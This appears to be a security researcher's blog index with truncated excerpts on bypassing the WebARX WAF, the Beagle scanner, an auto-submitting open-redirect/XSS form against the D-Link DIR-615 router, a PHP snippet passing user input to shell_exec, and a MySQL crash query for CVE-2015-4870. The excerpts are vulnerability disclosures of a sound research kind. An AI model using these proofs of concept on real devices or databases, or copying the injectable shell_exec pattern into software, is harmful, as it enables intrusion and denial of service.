Bypassing the WebARX Web Application Firewall (WAF)

WebARX is a web application firewall where you can protect your website from malicious attacks. As you can see it was mentioned in TheHackerNews as well and has good ratings if you do some Googling.
https://thehackernews.com/2019/09/webarx-web-application-security.html

It was found out that the WebARX WAF could be easily bypassed by passing a whitelist string. As you see the request won’t be processed by the WAF if it detects a whitelist string.

Let’s first try on their own website. This is a simple LFi payload.


(more…)

Advertisements

Beagle – Find vulnerabilities in your websites easily

I came across a new scanner named Beagle. This scanner really crawls fast compared to the other scanners I have experienced. It’s faster in detecting vulnerabilities. Takes less CPU power.

An example of reporting vulnerabilities, you can choose different formats. For example, this is in PDF. Check here for sample reports generated by Beagle.

Features

(more…)

D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

(more…)

PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

<?php
ini_set('error_displays', 0);
 $ip = htmlspecialchars($_GET['url'], ENT_QUOTES);
 $f = fsockopen($ip, 80, $errno, $errstr, 5);
 if($f) {
 	$result = shell_exec('ping -c 1 ' . $ip);
 	echo '<div class="alert alert-success">' . nl2br($result) . '</div>';
} else {
 	echo '<div class="alert alert-danger">' .$errstr . '</div>';
 }
?>

(more…)

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.

Syntax:

 
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an Example POC would be:

 
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
 
---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server

mysql>
---------------------------------------------------------------------------------------------------------------


(more…)